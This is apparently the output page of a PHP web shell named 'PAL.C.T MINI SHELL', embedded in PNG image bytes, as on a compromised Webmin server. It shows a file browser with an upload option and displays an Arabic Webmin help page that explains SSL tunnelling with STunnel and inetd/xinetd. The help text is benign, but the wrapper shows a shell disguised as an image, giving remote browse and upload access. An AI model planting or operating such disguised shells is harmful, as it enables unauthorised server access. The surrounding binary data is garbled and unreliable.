php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.ar.auto.html

<header> مقدمة إلى أنفاق SSL </header> SSL هو بروتوكول لتشفير البيانات في اتصال TCP أثناء انتقاله عبر الشبكة. تم تطويره في الأصل لحماية حركة المرور بين متصفحات الويب والخوادم ، ولكن يمكن استخدامه لتشفير أي نوع من دفق البيانات التي يتم إرسالها عادةً عبر بروتوكول TCP. <p style=";text-align:right;direction:rtl"> يسمح بروتوكول SSL للعملاء والخوادم بمصادقة أنفسهم مع بعضهم البعض ، حتى يتمكن العميل من التأكد من أنه متصل حقًا بالمضيف الذي يعتقد أنه كذلك. يتم ذلك باستخدام الشهادات التي تم إصدارها من قبل مرجع مصدق معترف به من قبل العميل (بحيث يمكن التحقق منها) وترتبط باسم مضيف معين. بدون شهادات ، يمكن للمهاجم إعادة توجيه اتصال SSL إلى خادمه الخاص والتقاط معلومات حساسة من عميل يعتقد أنه يتحدث إلى الخادم الحقيقي. <p style=";text-align:right;direction:rtl"> يمكن التقاط أي بيانات تنتقل عبر الإنترنت بدون تشفير وقراءتها بواسطة مهاجم لديه إمكانية الوصول إلى إحدى الشبكات التي يمر بها. حتى البيانات التي تنتقل بين نظام العميل والخادم على شبكة LAN يمكن الاستماع إليها بسهولة. عند الاتصال بخادم telnet أو FTP أو POP3 ، يتم إرسال كلمة المرور الخاصة بك عبر الشبكة وبالتالي يمكن للمهاجم التقاطها. <p style=";text-align:right;direction:rtl"> يمكن استخدام طبقة المقابس الآمنة لحماية البيانات في هذه الأنواع من المواقف ، ولكن فقط إذا كان كل من العميل والخادم يدعمها. يمكن لمعظم متصفحات الويب وعملاء البريد إنشاء اتصالات HTTP و POP3 و IMAP مشفرة بواسطة SSL ، ولكن لا يمكن لجميع خوادم الويب و POP3 قبولها. من الصعب حماية POP3 على وجه الخصوص ، لأن الخادم القياسي الذي يأتي مع معظم أنظمة Unix لا يدعم طبقة المقابس الآمنة على الإطلاق. لحسن الحظ على الرغم من وجود حل - STunnel. <p style=";text-align:right;direction:rtl"> STunnel هو برنامج بسيط يقوم بتحويل اتصال غير مشفر إلى اتصال مشفر بواسطة SSL. عادةً ما يتم إعداده ليتم تشغيله من خادم فائق مثل inetd أو xinetd ، ثم تشغيل بعض البرامج الأخرى مثل خادم POP3 الذي لا يدعم SSL. يسمح هذا التصميم لها بحماية أي خادم يتم تشغيله عادةً من inetd ، مثل خوادم telnet و NNTP و IMAP. <p style=";text-align:right;direction:rtl"> لا يمكن حماية جميع الخوادم بشكل مفيد مع التشفير ، لأنه لا يوجد عميل لاستخدامها في وضع SSL. على سبيل المثال ، لم أسمع أبدًا عن عميل telnet أو FTP يمكنه استخدام SSL ، لأن حزمة SSH الشائعة تسمح بالفعل بتسجيلات الدخول المشفرة ونقل الملفات عن بُعد. <p style=";text-align:right;direction:rtl"> تسهل وحدة Webmin هذه إعداد خدمات الخادم الفائق التي تقوم بتشغيل STunnel لبدء بعض برامج الخادم. على الرغم من أنه يمكن القيام بذلك يدويًا باستخدام وحدة خدمات الإنترنت ، فقد تم تصميم هذه الوحدة خصيصًا لإعداد وتكوين STunnel. يكتشف تلقائيًا ما إذا كان لديك inetd و / أو xinetd مثبتًا ، ويقرأ تكويناتها للتحقق من أنفاق SSL الحالية وإضافتها عند إنشاء نفق جديد. إذا تم تثبيت كليهما ، فستتم إضافة أنفاق SSL جديدة إلى تكوين xinetd حيث أنها أعلى من الاثنين في رأيي. <p style=";text-align:right;direction:rtl"><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`